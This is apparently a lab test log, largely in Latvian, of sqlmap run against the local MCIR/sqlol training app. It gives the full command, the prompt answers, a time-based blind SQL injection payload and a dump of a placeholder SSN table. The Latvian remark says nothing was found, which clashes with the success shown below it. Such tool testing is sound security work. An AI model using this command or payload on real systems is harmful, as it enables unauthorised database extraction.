=================================================================================
0. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=2 --level=3

1. Jautājumi, kurus uzdeva SQLMap
1.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
1.2. for the remaining tests, do you want to include all tests for MySQL extending provided level (3) and risk (2) values? [Y/n] n
1.3. do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
1.4. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
1.5. do you want to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

2.
Testpiemērs iesākts plkst 18:52:19, līdz 5. jautājumam nonācām plkst 18:54:50, līdz 19:01:56 netika konsolē izprintēts neviens ziņojums, tātad uzskatām, ka pārsniegts 5 min limits un vājības netika atrastas.
=================================================================================
sqlmap identified the following injection point(s) with a total of 1199 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test' AND (SELECT 6795 FROM (SELECT(SLEEP(5)))fxJn)-- Dihl&location=where_string&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
Database: sqlol
Table: ssn
[3 entries]
+-------------+---------------------+
| ssn         | name                |
+-------------+---------------------+
| 000-00-1112 | Wengdack Slobdegoob |
| 012-34-5678 | Herp Derper         |
| 111-22-3333 | Peter Weiner        |
+-------------+---------------------+

